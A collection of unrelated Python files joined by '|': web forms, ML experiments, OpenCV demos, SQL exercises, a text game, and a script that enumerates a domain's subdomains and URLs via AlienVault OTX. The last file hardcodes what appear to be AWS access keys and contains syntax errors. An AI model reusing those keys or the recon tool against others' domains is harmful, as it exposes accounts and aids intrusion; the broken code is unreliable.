from django.contrib.auth.tokens import default_token_generator
from django.contrib.sites.shortcuts import get_current_site
from django.core.mail import EmailMultiAlternatives
from django.template import loader
from django.utils.encoding import force_bytes
from django.utils.http import urlsafe_base64_encode
from django.utils.text import capfirst
from django.utils.translation import gettext, gettext_lazy as _
from django.contrib.auth.forms import UserCreationForm, UserChangeForm
from .models import CustomUser
from django.contrib.auth.forms import SetPasswordForm
from django.forms import ModelForm
# from phone_field import PhoneField, PhoneWidget, PhoneFormField
UserModel = get_user_model()
class CustomUserCreationForm(UserCreationForm):
"""
A form that creates a user, with no privileges, from the given email and
password.
"""
def __init__(self, *args, **kargs):
super(CustomUserCreationForm, self).__init__(*args, **kargs)
# del self.fields['username']
class Meta:
model = CustomUser
fields = ("email",)
class CustomUserChangeForm(UserChangeForm):
"""A form for updating users. Includes all the fields on
the user, but replaces the password field with admin's
password hash display field.
"""
def __init__(self, *args, **kargs):
super(CustomUserChangeForm, self).__init__(*args, **kargs)
# del self.fields['username']
class Meta:
model = CustomUser
fields = ("email",)
class CustomSetPasswordForm(SetPasswordForm):
error_messages = {
'password_mismatch': _("The two password fields didn't match."),
}
new_password1 = forms.CharField(
label=_(""),
widget=forms.PasswordInput(
attrs={
'placeholder': 'Новый пароль'
}
),
strip=False,
help_text='',
)
new_password2 = forms.CharField(
label=_(""),
strip=False,
widget=forms.PasswordInput(
attrs={
'placeholder': 'Повторите пароль еще раз'
}
),
)
# class CustomPhoneFormField(PhoneFormField):
# widget = PhoneWidget
class CustomUserForm(forms.ModelForm):
first_name = forms.CharField(
label=_(""),
max_length=200,
# help_text='Required - email',
widget=forms.TextInput(
attrs={
'placeholder': 'Имя'
}
),
)
last_name = forms.CharField(
label=_(""),
max_length=200,
# help_text='Required - email',
widget=forms.TextInput(
attrs={
'placeholder': 'Фамилия'
}
),
)
phone = forms.CharField(
label=_(""),
max_length=12,
# help_text='Required - email',
widget=forms.TextInput(
attrs={
'placeholder': 'Телефон'
}
),
)
def __init__(self, *args, **kargs):
super(CustomUserForm, self).__init__(*args, **kargs)
class Meta:
model = CustomUser
fields = ('first_name', 'last_name', 'phone')
class ChangeUsersProfiles(CustomUserForm):
is_active = forms.BooleanField(
label=_("Доступ в Веб-интерфейс"),
# help_text='Required - email',
widget=forms.CheckboxInput(),
required=False
)
def __init__(self, *args, **kargs):
super(ChangeUsersProfiles, self).__init__(*args, **kargs)
self.fields['phone'].label = 'Телефон'
self.fields['phone'].widget.attrs['placeholder'] = 'Телефон'
self.fields['phone'].widget.attrs['required'] = 'True'
self.fields['phone'].help_text = None
self.fields['email'].label = 'E-mail'
self.fields['email'].widget.attrs['placeholder'] = 'E-mail'
self.fields['email'].help_text = None
self.fields['first_name'].label = 'Имя'
self.fields['first_name'].widget.attrs['placeholder'] = 'Имя'
self.fields['first_name'].help_text = None
self.fields['last_name'].label = 'Фамилия'
self.fields['last_name'].widget.attrs['placeholder'] = 'Фамилия'
self.fields['last_name'].help_text = None
self.fields['balance'].label = 'Баланс'
self.fields['balance'].widget.attrs['placeholder'] = 'Баланс'
self.fields['balance'].help_text = None
self.fields['cardId'].label = 'ID карты'
self.fields['cardId'].widget.attrs['placeholder'] = 'ID карты'
self.fields['cardId'].help_text = None
self.fields['groups'].label = 'Группа'
self.fields['groups'].help_text = None
class Meta:
model = CustomUser
fields = ('phone', 'first_name', 'last_name', 'email', 'groups', 'balance', 'cardId', 'is_active', 'cardNumber')
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
self.instance.first_name = self.cleaned_data.get('first_name')
self.instance.last_name = self.cleaned_data.get('last_name')
self.instance.email = self.cleaned_data.get('email')
self.instance.phone = self.cleaned_data.get('phone')
self.instance.is_active = self.cleaned_data.get('is_active')
self.instance.cardNumber = self.cleaned_data.get('cardNumber')
self.instance.save()
class CustomAddUser(ChangeUsersProfiles):
def __init__(self, *args, **kargs):
super(CustomAddUser, self).__init__(*args, **kargs)
class Meta:
model = CustomUser
fields = ('phone', 'first_name', 'last_name', 'email', 'groups', 'balance', 'cardId', 'is_active', 'cardNumber')
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 28 14:51:32 2021
@author: Hewlett-Packard
"""
from sklearn.model_selection import KFold
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn import svm
from sklearn import metrics
from sklearn.metrics import confusion_matrix, classification_report
import pandas as pd
import numpy as np
class CM:
def LinearSVM(k, X, y):
skf = KFold(n_splits=k)
akurasi = []
recall = []
precision=[]
cm = []
for train_index, test_index in skf.split(X):
X_train, X_test, y_train, y_test = X[train_index], X[test_index], y[train_index], y[test_index]
vectorizer = TfidfVectorizer(norm = 'l1')
X_train=vectorizer.fit_transform(X_train)
X_test=vectorizer.transform(X_test)
clf=svm.SVC(kernel='linear', C=10)
clf.fit(X_train,y_train)
y_pred = clf.predict(X_test)
akurasi.append(metrics.accuracy_score(y_test, y_pred))
recall.append(metrics.recall_score(y_test, y_pred))
precision.append(metrics.precision_score(y_test, y_pred))
cm.append(confusion_matrix(y_test,y_pred))
akurasiTotal = np.mean(akurasi)
return cm, akurasi, akurasiTotal
def RbfSVM(k, X, y):
skf = KFold(n_splits=k)
akurasi = []
recall = []
precision=[]
cm=[]
for train_index, test_index in skf.split(X):
X_train, X_test, y_train, y_test = X[train_index], X[test_index], y[train_index], y[test_index]
vectorizer = TfidfVectorizer(norm = 'l1')
X_train=vectorizer.fit_transform(X_train)
X_test=vectorizer.transform(X_test)
clf=svm.SVC(kernel='rbf', C=5, gamma = 9)
clf.fit(X_train,y_train)
y_pred = clf.predict(X_test)
akurasi.append(metrics.accuracy_score(y_test, y_pred))
recall.append(metrics.recall_score(y_test, y_pred))
precision.append(metrics.precision_score(y_test, y_pred))
cm.append(confusion_matrix(y_test,y_pred))
akurasiTotal = np.mean(akurasi)
return cm, akurasi, akurasiTotal
def PolySVM(k, X, y):
skf = KFold(n_splits=k)
akurasi = []
recall = []
precision=[]
cm=[]
for train_index, test_index in skf.split(X):
X_train, X_test, y_train, y_test = X[train_index], X[test_index], y[train_index], y[test_index]
vectorizer = TfidfVectorizer(norm = 'l1')
X_train=vectorizer.fit_transform(X_train)
X_test=vectorizer.transform(X_test)
clf=svm.SVC(kernel='poly', C=35, gamma = 'scale', degree = 2)
clf.fit(X_train,y_train)
y_pred = clf.predict(X_test)
akurasi.append(metrics.accuracy_score(y_test, y_pred))
recall.append(metrics.recall_score(y_test, y_pred))
precision.append(metrics.precision_score(y_test, y_pred))
cm.append(confusion_matrix(y_test,y_pred))
akurasiTotal = np.mean(akurasi)
return cm, akurasi, akurasiTotal |
__author__ = 'dowling'
import logging
ln = logging.getLogger(__name__)
from mongokit import Document
from model.db import connection
from model.db import db
class Fridge(Document):
structure = {
'content': {
unicode: int
}
}
use_dot_notation = True
use_autorefs = True
def transact_item(self, item, quantity):
old_quantity = self.content.get(item, None)
print item, quantity, old_quantity
if quantity < 0: # take out
if old_quantity is None:
old_quantity = 0
ln.warn("Attempting to take item %s out of fridge, but previous value was %s" % (item, old_quantity))
else: # put in
if old_quantity is None:
old_quantity = 0
ln.warn("Adding new item %s (quantity %s)" % (item, old_quantity))
ln.debug("Putting %s of %s into fridge" % (quantity, item))
print old_quantity
self.content[item] = old_quantity + quantity
connection.register([Fridge])
fridge_collection = db.fridges
#fridge = fridge_collection.Fridge()
#fridge.save()
#fridge.reload()
def get_fridge():
fs = list(fridge_collection.Fridge.find())
for f in fs:
if f.content:
return f
if not fs:
f = fridge_collection.Fridge()
f.save()
f.reload()
return f
else:
return fs[0]
|
from collections import Counter
s = input()
lettr_freq = Counter(s)
most_comn = list(lettr_freq.items())
most_comn.sort(key=lambda t: (-t[1], t[0]))
for lettr, freq in most_comn[:3]:
print(lettr, freq)
|
""" Experiment with face detection and image filtering using OpenCV """
import cv2
import numpy as np
cap = cv2.VideoCapture(0)
face_cascade = cv2.CascadeClassifier('/home/audrey/ToolBox-ComputerVision/haarcascade_frontalface_alt.xml')
kernel = np.ones((21,21),'uint8')
while(True):
# Capture frame-by-frame
ret, frame = cap.read()
faces = face_cascade.detectMultiScale(frame, scaleFactor=1.2, minSize=(20,20))
for (x,y,w,h) in faces:
frame[y:y+h,x:x+w,:] = cv2.dilate(frame[y:y+h,x:x+w,:], kernel)
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,0,255))
cv2.circle(frame, (int(x+w/4),int(y+h/3)), 15, (255,0,0),-1)
cv2.circle(frame, (int(x+3*w/4),int(y+h/3)), 15, (255,0,0),-1)
cv2.ellipse(frame, (int(x+w/2),int(y+2*h/3)), (20,40), 0, 0, 180, (0,0,255),10)
# Display the resulting frame
cv2.imshow('frame',frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows() |
import unittest
import smart_match
class TestHammingDistance(unittest.TestCase):
def setUp(self):
smart_match.use('HD')
def test_distance(self):
self.assertEqual(smart_match.distance('12211','11111'), 2)
self.assertEqual(smart_match.distance('hello','heool'), 3)
def test_similarity(self):
self.assertEqual(smart_match.similarity('12211','11111'), 0.6)
self.assertEqual(smart_match.similarity('hello','heool'), 0.4)
if __name__=='__main__':
unittest.main()
|
import sys
class Solution(object):
def maxSubArray(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
answer = -sys.maxsize
current_sum = 0
for num in nums:
current_sum = max(num, current_sum + num)
answer = max(answer, current_sum)
return answer
nums = [-2, 1, -3, 4, -1, 2, 1, -5, 4]
# Output: 6
sol = Solution()
print(sol.maxSubArray(nums))
|
'''
Don't believe everything below...
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import argparse, os
import tensorflow as tf
from tensorflow.contrib.rnn import BasicLSTMCell
from toy_data import prepare_data
def next_batch(train_data):
return None
def main(model, n_iter, n_batch, n_hidden):
# --- Set data params ----------------
n_input = 10 * 4
n_output = 4 * 4
n_classes = 5
# --- Prepare data -------------
train_data, test_data = prepare_data()
# --- Create graph and compute gradients ----------------------
x = tf.placeholder("float", [None, n_input, n_classes])
y = tf.placeholder("float", [None, n_output, n_classes])
V_init_val = np.sqrt(6.)/np.sqrt(n_classes * 2)
# --- Input to hidden layer ----------------------
cell = BasicLSTMCell(n_hidden, state_is_tuple=True, forget_bias=1)
hidden_out, _ = tf.nn.dynamic_rnn(cell, x, dtype=tf.float32)
# --- Hidden Layer to Output ----------------------
V_weights = tf.get_variable("V_weights", shape = [n_hidden, n_classes], \
dtype=tf.float32, initializer=tf.random_uniform_initializer(-V_init_val, V_init_val))
V_bias = tf.get_variable("V_bias", shape=[n_classes], \
dtype=tf.float32, initializer=tf.constant_initializer(0.01))
hidden_out_list = tf.unstack(hidden_out, axis=1)
temp_out = tf.stack([tf.matmul(i, V_weights) for i in hidden_out_list[-n_output:]])
output_data = tf.nn.bias_add(tf.transpose(temp_out, [1,0,2]), V_bias)
# --- evaluate process ----------------------
mse = tf.reduce_mean(tf.squared_difference(y, output_data))
# --- Initialization ----------------------
optimizer = tf.train.RMSPropOptimizer(learning_rate=0.001, decay=0.9).minimize(mse)
init = tf.global_variables_initializer()
# --- Training Loop ----------------------
with tf.Session(config=tf.ConfigProto(log_device_placement=False, allow_soft_placement=False)) as sess:
sess.run(init)
step = 0
steps = []
mses = []
while step < n_iter:
batch_x, batch_y = next_batch(n_batch)
sess.run(optimizer, feed_dict={x: batch_x, y: batch_y})
mse_value = sess.run(mse, feed_dict={x: batch_x, y: batch_y})
print("Iter " + str(step) + ", MSE= " + "{:.6f}".format(mse_value))
steps.append(step)
mses.append(mse_value)
step += 1
print("Optimization Finished!")
if __name__=="__main__":
parser = argparse.ArgumentParser(
description="RNN Toy Task")
parser.add_argument("model", default='LSTM', help='Model name: LSTM, EURNN, uLSTM, resNet')
parser.add_argument('--n_iter', '-I', type=int, default=10000, help='training iteration number')
parser.add_argument('--n_batch', '-B', type=int, default=128, help='batch size')
parser.add_argument('--n_hidden', '-H', type=int, default=1024, help='hidden layer size')
args = parser.parse_args()
dict = vars(args)
for i in dict:
if (dict[i]=="False"):
dict[i] = False
elif dict[i]=="True":
dict[i] = True
kwargs = {
'model': dict['model'],
'n_iter': dict['n_iter'],
'n_batch': dict['n_batch'],
'n_hidden': dict['n_hidden'],
}
main(**kwargs)
|
import sqlite3
db = sqlite3.connect("world.db")
cr = db.cursor()
ans = cr.execute("SELECT name FROM country WHERE population > 100000000")
print("1-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT name FROM country WHERE name like '%land'")
print("2-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT name FROM city WHERE Population BETWEEN 500000 and 1000000")
print("3-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT name FROM country WHERE Continent = 'Europe'")
print("4-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT name FROM country ORDER BY SurfaceArea DESC")
print("5-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT name FROM city WHERE CountryCode = 'NLD'")
print("6-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT Population FROM city WHERE name = 'Amsterdam'")
print("7-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT city.name FROM city INNER JOIN country on city.CountryCode = country.Code WHERE Continent = 'Europe' ORDER BY city.Population DESC LIMIT 1")
print("8-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT name FROM country WHERE Continent = 'Africa' ORDER BY SurfaceArea DESC LIMIT 1")
print("9-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT name FROM country WHERE Continent = 'Asia' ORDER BY SurfaceArea DESC LIMIT 10")
print("10-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT name FROM country ORDER BY SurfaceArea LIMIT 1")
print("11-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT name FROM city ORDER BY Population DESC LIMIT 10")
print("12-\n", ans.fetchall(), "\n")
ans = cr.execute("SELECT sum(population) FROM country ")
print("13-\n", ans.fetchall(), "\n")
|
import cv2
import numpy as np
class Zoom(object):
def __init__(self, window, img):
self.window = window
self.img0 = img
self.img = img
self.left_clicked = False
self.xm0, self.ym0 = 0,0
cv2.namedWindow(self.window)
cv2.setMouseCallback(self.window, self.onmouse)
self.img = cv2.resize(img, (850, 1000), interpolation=cv2.INTER_LINEAR)
self.nwindow = "zoom"
self.show()
def show(self):
# print(self.img.shape)
cv2.moveWindow(self.nwindow,400,0)
while True:
cv2.imshow(self.nwindow, self.img)
key = cv2.waitKey(1)
if key != -1:
print(key)
if key == 27:
break
cv2.destroyAllWindows()
def onmouse(self, event, x, y, flags, param):
if event == cv2.EVENT_LBUTTONDOWN:
self.left_clicked = True
self.xm0, self.ym0 = x, y
elif event == cv2.EVENT_LBUTTONUP:
if self.left_clicked:
if self.xm0 > x:
self.xm0, x = x, self.xm0
if self.ym0 > y:
self.ym0, y = y, self.ym0
ancho, alto = (x - self.xm0), (y - self.ym0)
propor = self.img.shape[0] / self.img.shape[1]
k = alto / ancho
if propor >= 1:
if k < 1:
alto = int(ancho * propor)
else:
ancho = int(alto / propor)
self.img = self.img[self.ym0: self.ym0 + alto, self.xm0: self.xm0 + ancho]
self.img = cv2.resize(self.img, (850, 1000), interpolation=cv2.INTER_LINEAR)
self.left_clicked = False
elif event == cv2.EVENT_RBUTTONDOWN:
self.img = cv2.resize(self.img0, (850, 1000), interpolation=cv2.INTER_LINEAR)
img = cv2.imread('ValtodaD.jpg')
Zoom('zoom', img)
|
'''
70. データの入手・整形
文に関する極性分析の正解データを用い,以下の要領で正解データ(sentiment.txt)を作成せよ.
1. rt-polarity.posの各行の先頭に"+1 "という文字列を追加する
(極性ラベル"+1"とスペースに続けて肯定的な文の内容が続く)
2. rt-polarity.negの各行の先頭に"-1 "という文字列を追加する
(極性ラベル"-1"とスペースに続けて否定的な文の内容が続く)
3. 上述1と2の内容を結合(concatenate)し,行をランダムに並び替える
sentiment.txtを作成したら,正例(肯定的な文)の数と負例(否定的な文)の数を確認せよ.
'''
import os
import sys
import random
import tarfile
def message(text):
sys.stderr.write(f"\33[92m{text}\33[0m\n")
POS = '.pos'
NEG = '.neg'
ALL = '.all'
data = {}
with tarfile.open("rt-polaritydata.tar.gz", 'r:gz') as tar:
for tarinfo in tar:
root, ext = os.path.splitext(tarinfo.name)
if ext not in (POS, NEG): # 拡張子で判断
continue
message(tarinfo.name)
label = "+1" if ext == POS else "-1"
with tar.extractfile(tarinfo.name) as f:
data[ext] = [
f"{label} {line.decode('latin-1').rstrip()}\n" for line in f]
print(f"{ext}: {len(data[ext])}")
data[ALL] = data[POS] + data[NEG]
random.seed(123)
random.shuffle(data[ALL])
with open('./sentiment.txt', 'w') as f:
f.writelines(data[ALL])
'''
* 「sentence polarity dataset v1.0」の取説
http://www.cs.cornell.edu/people/pabo/movie-review-data/rt-polaritydata.README.1.0.txt
* tarfile モジュール
https://docs.python.org/ja/3/library/tarfile.html
* random モジュール
https://docs.python.org/ja/3/library/random.html
* コマンド
$ grep "^+1" ./sentiment.txt | wc -l
5331
$ grep "^-1" ./sentiment.txt | wc -l
5331
'''
|
import cmd
import textwrap
import sys
import os
#import math
#import copy
#from pydub import AudioSegment
#from pydub.playback import play
#from text_utilities import *
from item import*
from Player import*
from json_handler import*
from move import*
screen_width = 60
### Title Screen ###
def title_screen_selections():
inp = prompt_select_from("", ["play", "help", "quit"], "Please enter a valid command.")
if inp == "play":
start_game()
elif inp == "help":
help_menu()
else:
sys.exit()
def title_screen():
clear()
print_intense("Marpshwallow!")
print (" -Play- ")
print (" -Help- ")
print (" -Quit- ")
print (" --Copyright 2019 avaughan.me--")
title_screen_selections()
def help_menu():
print ("###############################")
print ("Welcome to Marshmallow Recruitment Laboratories Inc.")
print ("###############################")
print ("Use up, down, left, pizza to move.")
print ("marshmallow your commands")
print ("Use something like 'look' or\n'examine' to inspect something")
print ("Figure it out! You're in a pop topping rock tipping hot topping talbo-dee-doo!")
title_screen_selections()
def setup_game():
slow = False
if slow:
myPlayer.name = slow_prompt("Howdy Doo! \nWho Are You?")
else:
myPlayer.name = "Fartmonster"
myPlayer.reset_hp_mp()
if slow:
#ques_1()
intro()
clear()
print("########################\n## IT BEGINS TO ITCH ###\n########################\n")
main_game_loop()
else:
clear()
print_intense("########################\n## IT BEGINS TO ITCH ###\n########################\n")
myPlayer.print_location()
main_game_loop()
def intro():
slow_print_ack("Swim, " + myPlayer.name + "!\nSWiM!!", t = 0.02)
inp = prompt_select_from("What are you doing?\n Swim!!!\n", ['drown', 'swim'], "You're gonna die!")
if inp == "swim":
slow_print_ack("The water is too shallow. . .\n", t = 0.03)
slow_print_ack("No matter how hard you try, the swamp just isn't a good place\nfor exercise.")
slow_print_ack("And if you slough around here too long you could\nwind up getting that weird rash again.", t = 0.03)
time.sleep(0.5)
elif inp == "drown":
slow_print_ack("You lazily set yourself adrift atop the murky waters. . . \n", t = 0.03)
slow_print_ack("Despite your best efforts, the swamp waters are too shallow to drown in.\n", t = 0.03)
###GAME INTERACTIVITY###
#def make_sound():
# alarm = AudioSegment.from_wav("Alarm01.wav")
# play(alarm)
def god_mode():
inp = prompt_select_from("Sup?\n A) Room Editor\n B) Teleport\n C) Keys\n D) Restore Defaults\n E) Exit\n>>>", ['a', 'b', 'c', 'd', 'e', 'doughnut'], "Choose either A, B, C, D, OR E\n>>>")
if inp == 'a':
myPlayer.editrooms = True
print ("Room editor commands enabled")
god_mode()
elif inp == 'b':
myPlayer._teleport = True
print ("teleport commands enabled")
god_mode()
elif inp == 'c':
myPlayer.keys = True
print ("Room lock control enabled")
god_mode()
elif inp == 'd':
slow_print("Everything is back to norbal !\n")
myPlayer.editrooms = False
myPlayer._teleport = False
myPlayer.keys = False
prompt()
elif inp == 'e':
slow_print("I hope you made a fucking difference.", t=0.05, )
prompt()
else:
print_intense("AHHH!!\nDOUGHNUT!!\n")
god_mode()
def lookup_address_by_name(name):
try:
address = zonemap_lookup_address_by_name[name]
address = special_lookup_address_by_name[name]
# room = zonemap[address]
return address#, room
except:
return None, None
def player_teleport(myAction):
while True:
dest = input("Where would you like to teleport?\n")
dest_address = lookup_address_by_name(dest)
if dest_address == None:
print("That is not a valid destination, try again")
else:
print("\n" + "you have teleported to " + dest + ".\n")
myPlayer.location = dest_address
myPlayer.print_location()
prompt()
def player_examine(action):
if zonemap[myPlayer.location][Solved]:
print("Solved")
else:
print("Unsolved")
####Trigger event.
###GAME FUNCTIONALITY###
def start_game():
clear()
setup_game()
main_game_loop()
return
def main_game_loop():
while myPlayer.game_over is False:
prompt()
### here handle if game has been solved
def prompt():
print("\n" + "=====================")
# I want to add: look, glance, read, climb, take, 'eat', 'drink', 'back', blah blah blah I want this to all be in a json file, daddy.
acceptable_actions = ['sit', 'stand', 'sound', 'help', 'move', 'go', 'walk', 'quit', 'examine', 'scratch', 'glance', 'look', 'look at', 'onscreen', 'baswash', 'teleport', 'dev']
action = prompt_select_from("What would you like to do?", acceptable_actions, "Unknown action, tryangle again.")
if action.lower() == 'quit':
input("ARE YOU SURE YOU WANT TO QUIT? y/n*\n>>>")
if input == 'y' 'Y' 'yes' 'Yes':
sys.exit()
else:
prompt()
elif action.lower() in ['sound']:
make_sound()
elif action.lower() in ['help']:
cry_for_help()
elif action.lower() in ['move', 'go', 'walk']:
player_move(action.lower(), zonemap, myPlayer)
elif action.lower() in ['glance']:
myPlayer.player_glance()
elif action.lower() in ['look']:
myPlayer.player_look()
elif action.lower() in ['onscreen']:
myPlayer.print_location()
elif action.lower() in ['baswash']:
god_mode()
elif action.lower() in ['scratch']:
slow_print_ack("You can't scratch this itch.\nI'm sorry.")
elif action.lower() in ['sit']:
slow_print_ack("You sit on the wet ground.\n", t = .08)
elif action.lower in ['stand']:
slow_print_ack("You feel the ground under your socks.\n", t = 0.05)
elif action.lower() in ['dev']:
if myPlayer.editrooms is True:
room_edit_prompt()
else:
slow_print("You can't do that without permission.")
prompt()
elif action.lower() in ['teleport']:
if myPlayer.can_teleport():
player_teleport(action.lower())
else:
slow_print("You can't do that without permission.")
prompt()
def cry_for_help():
slow_print_ack("HELP!\n", t = 0.05)
slow_print_ack("HEEEEEEELP!!!!\n", t = 0.03)
slow_print_ack("... ... ...\n", t = 0.04)
slow_print_ack("No answer, but you think you hear the sound of distant drums.\nBetter hunker down and lay low.", t = 0.03)
myPlayer = Player(zonemap)
#myRoom = Room()
title_screen()
##### def room_edit_prompt():
# inp = prompt_select_from("A)New Room\n B)Edit this room\n C)Exit", ['a', 'b', 'c'], "Try again.")
# inp = inp.lower()
#if inp == 'a':
# create_new_room(myRoom)
# elif inp == 'b':
# edit_room()
# elif inp == 'c':
# slow_print("Sam hands the ring back to Frodo")
# prompt()
|
#!/usr/bin/python3
import urllib3, sys, json, os
class Recon():
def __init__(self):
self.domain = sys.argv[1]
self.http = urllib3.PoolManager()
try:
os.mkdir(sys.argv[1])
except Exception:
pass
def passive_dns(self):
r = self.http.request("GET",f"https://otx.alienvault.com/otxapi/indicator/hostname/passive_dns/{self.domain}")
return json.loads(r.data.decode('utf-8'))
def urls(self,sub):
r = self.http.request("GET",f"https://otx.alienvault.com/otxapi/indicator/hostname/url_list/{sub}")
return json.loads(r.data.decode('utf-8'))
bot = Recon()
print("[*] Looking for subdomains.....")
for i in bot.passive_dns()["passive_dns"]:
with open(f"./{bot.domain}/subdomains.txt","a") as save_file:
if bot.domain in i["hostname"]:
save_file.write(i["hostname"]+"\n")
print(i["hostname"])
save_file.close()
print("[*] Looking for urls.....")
for i in bot.passive_dns()["passive_dns"]:
if bot.domain in i["hostname"]:
# print(bot.urls(i["hostname"]))
for b in bot.urls(i["hostname"])["url_list"]:
with open(f"./{bot.domain}/urls.txt","a") as save_file:
save_file.write(b["url"]+"\n")
print(b["url"])
save_file.close() |
import dash
import dash_html_components as html
import time
from jitcache import Cache
cache = Cache()
app = dash.Dash(__name__)
server = app.server
app.layout = html.Div(
children=[
html.Button("Submit", id="button"),
html.Div(id="output-container-button1", children=[]),
html.Div(id="output-container-button2", children=[]),
]
)
# This is only called once per click
@cache.memoize
def slow_fn(input_1, input_2):
print("Slow Function Called")
time.sleep(1)
return input_1 * input_2
@app.callback(
dash.dependencies.Output("output-container-button1", "children"),
[dash.dependencies.Input("button", "n_clicks")],
)
def update_output1(n_clicks):
input_1 = n_clicks if n_clicks is not None else 0
input_2 = 2
value = slow_fn(input_1, input_2)
return f"Value is {value} and the button has been clicked {n_clicks} times"
@app.callback(
dash.dependencies.Output("output-container-button2", "children"),
[dash.dependencies.Input("button", "n_clicks")],
)
def update_output2(n_clicks):
input_1 = n_clicks if n_clicks is not None else 0
input_2 = 2
value = slow_fn(input_1, input_2)
return f"Value is {value} and the button has been clicked {n_clicks} times"
if __name__ == "__main__":
app.run_server(debug=True)
|
#!/usr/local/bin/python2.7
# coding=utf8
import sys, os
import traceback
from inspect import stack
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../Config'))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../Utility'))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../Model'))
from mongokit import ObjectId
from Constants import *
from Config import *
from BaseController import CBaseController
from IncidentModel import CIncidentModel
from ITSMAPIController import CITSMAPI
class CUpdateITSMIncidentController(CBaseController):
def __init__(self, **kwargs):
super(CUpdateITSMIncidentController, self).__init__(**kwargs)
# ---------------------------------------------------------------------------------------------- #
def UpdateWaitingIncident(self):
try:
#print 'Updating ......'
oIncidentModel = CIncidentModel(self.m_oConfig)
oAPI = CITSMAPI(config=self.m_oConfig)
if oIncidentModel is not None:
arrWaitingInc = oIncidentModel.ListWaitingUpdateIncident()
#print arrWaitingInc
for oIncident in arrWaitingInc:
#print oIncident
if oIncident['ccutime'] is not None and oIncident['ccutime'] != "":
oIncident['ccutime'] = int(oIncident['ccutime'])
if oIncident['connection'] is not None and oIncident['connection'] != "":
oIncident['connection'] = int(oIncident['connection'])
if oIncident['customerimpacted'] is not None and oIncident['customerimpacted'] != "":
oIncident['customerimpacted'] = int(oIncident['customerimpacted'])
# print oIncident
for k, v in oIncident.items():
if v is None:
del oIncident[k]
#print oIncident
oRs = oAPI.UpdateIncident(oIncident)
oRsUpdateStatus = None
try:
if oIncident['incident_status'] == INCIDENT_STATUS_RESOLVE or oIncident['incident_status'] == INCIDENT_STATUS_REOPEN:
oRsUpdateStatus = oAPI.UpdateIncidentStatus(oIncident)
else:
oRsUpdateStatus = oRs
except:
oRsUpdateStatus = oRs
pass
oUpdateData = dict()
oUpdateData['sdk_update_to_itsm_status'] = ITSM_STATUS_FAIL
if oRs is not None and oRsUpdateStatus is not None:
if oRs['status'] == ITSM_STATUS_OK and oRsUpdateStatus['status'] == ITSM_STATUS_OK:
oUpdateData['sdk_update_to_itsm_status'] = ITSM_STATUS_OK
if oRs['msg'] == oRsUpdateStatus['msg']:
oUpdateData['sdk_last_msg'] = oRs['msg']
else:
oUpdateData['sdk_last_msg'] = '{"normal_update_msg": "%s", "status_update_msg": "%s"' % (oRs['msg'], oRsUpdateStatus['msg'])
else:
oUpdateData['sdk_last_msg'] = 'Unknown'
oUpdateData['sdk_last_update_to_itsm'] = Utilities.GetCurrentTimeMySQLFormat()
oUpdateData['sdk_update_to_itsm_count'] = {'type': MYSQL_VALUE_TYPE_EXPRESSION, 'value': 'IFNULL(sdk_update_to_itsm_count,0) + 1'}
oIncidentModel.UpdateWaitingUpdateIncident({'id': oIncident['sdk_id']}, oUpdateData)
oIncidentModel.DeleteIncidentUpdateSuccess()
oIncidentModel.CloseMySQLConnection()
except Exception, exc:
strErrorMsg = '%s Error: %s - Line: %s' % (str(exc), stack()[0][3], sys.exc_traceback.tb_lineno) # give a error message
Utilities.WriteErrorLog(strErrorMsg, self.m_oConfig)
if __name__ == '__main__':
while(True):
#print "Start UpdateITSMIncident"
try:
oConfig = CConfig()
oController = CUpdateITSMIncidentController(config=oConfig)
oController.UpdateWaitingIncident()
#oController.Test()
exit
except Exception, exc:
strErrorMsg = '%s Error: %s - Line: %s' % (str(exc), stack()[0][3], sys.exc_traceback.tb_lineno) # give a error message
Utilities.WriteErrorLog(strErrorMsg, oConfig)
pass
#print "End CreateITSMIncident"
time.sleep(SLEEP_NOTIFY_ITSM_STATUS)
|
import reference
import re
import random
def main():
print("Hello. How are you feeling today?")
while True:
statement = input("> ")
print(translate(statement))
if statement == "quit":
break
def translate(statement):
statement = statement.replace("!", " ")
statement = statement.replace(".", " ")
for key in reference.psychobabble_responses:
match = re.search(reference.psychobabble_patterns[key], statement)
if match:
response = random.choice(reference.psychobabble_responses[key])
return(reference.format_response(match, response))
main() |
import boto3
import sys
class AWS:
def __init__(self, bucket_name, bucket_region):
self.bucket_name = bucket_name
self.bucket_region = bucket_region
self.file_name = file_name
self.key key
def create_user_bucket(self, bucket_name, bucket_region):
client = boto3.client('s3', aws_access_key_id='AKIATC6DXP3TY5LMMBC7', aws_secret_access_key='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')
buckets = client.create_bucket(Bucket = self.bucket_name, CreateBucketConfiguration={'LocationConstraint': self. bucket_region})
print("Created bucket {}.".format(bucket_name))
return buckets
def upload_file_into_bucket(self, file_name, bucket_name, key):
resource = boto3.client('s3', aws_access_key_id='AKIATC6DXP3TY5LMMBC7', aws_secret_access_key='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')
file_upload = resource.meta.client.upload_file(Filename = self.file_name, Bucket = self.bucket_name, Key = self.key)
print("{} with {} is successfully uploaded into {} of S3".format(file_name, key, bucket_name))
def download_file_from_bucket(self, file_name, bucket_name, key):
resource = boto3.client('s3', aws_access_key_id='AKIATC6DXP3TY5LMMBC7', aws_secret_access_key='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')
download_file = resource.meta.client.download_file(Filename = self.file_name, Bucket = self.bucket_name, Key = self.key)
print("{} with {} is successfully downloaded from {} of S3".format(file_name, key, bucket_name))
if __name__ == '__main__':
